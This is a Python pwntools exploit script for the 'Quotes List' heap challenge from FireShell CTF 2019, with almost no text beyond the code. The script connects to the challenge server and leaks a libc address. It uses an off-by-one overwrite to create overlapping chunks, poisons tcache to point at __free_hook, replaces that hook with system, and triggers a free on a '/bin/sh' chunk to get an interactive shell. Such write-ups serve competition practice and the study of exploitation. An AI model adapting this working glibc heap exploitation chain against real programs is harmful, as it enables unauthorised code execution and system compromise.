FireShell CTF 2019 Quotes List

exploit.py

from pwn import *
import re


def alloc(size, content):
	p.recvuntil('> ')
	p.sendline('1')
	p.recvuntil('Length: ')
	p.sendline(str(size))
	p.recvuntil('Content: ')
	p.send(content)

def edit(idx, content):
	p.recvuntil('> ')
	p.sendline('2')
	p.recvuntil('Index: ')
	p.sendline(str(idx))
	p.recvuntil('Content: ')
	p.send(content)

def free(idx):
	p.recvuntil('> ')
	p.sendline('4')
	p.recvuntil('Index: ')
	p.sendline(str(idx))

def show(idx):
	p.recvuntil('> ')
	p.sendline('3')
	p.recvuntil('Index: ')
	p.sendline(str(idx))
	return p.recvuntil('---')

def exploit():
	alloc(0x1000, 'A') #allocate large chunk to leak libc
	alloc(0x40-8, 'B')
	free(0) # free it now it will go to unsorted bin
	alloc(0x40-8, 'B') #allocate from unsorted bin 
	libc = re.findall('Quote: ' + '(.*)', show(0))[0] #leak libc
	libc = u64(libc.ljust(8, '\x00')) - 0x25
	print hex(libc)
	alloc(0x40-8, 'C') # prepare the heap for chunk overlap
	alloc(0x40-8, 'D') # another chunk for overlap
	edit(0, 'B'*(0x40-8) + '\x81') # off by one and modify next size
	free(3) # it will go to tcache of size 0x40
	free(2) # it will go to tcache of size 0x80 we have overlap with 3
	__free_hook = libc + 0x16ab
	alloc(0x80-8, 'A'*(0x40-8) + p64(0x41) + __free_hook) # allocate over 3 now we override fd of 2 to __free_hook 
	alloc(0x40-8, '/bin/sh\x00') # first alloc prepare our string
	system = libc - 0x36d62d
	alloc(0x40-8, p64(system)) # second alloc will override __free_hook to system
	free(3) # trigger __free_hook on 3 that contains binsh

if __name__ == '__main__':
	p = remote('challs.fireshellsecurity.team', 31008)
	# p =	process(['./ld-linux-x86-64.so.2', './quotes_list'], env={'LD_PRELOAD': './libc.so.6'})
	# gdb.attach(p)
	exploit()
	p.interactive()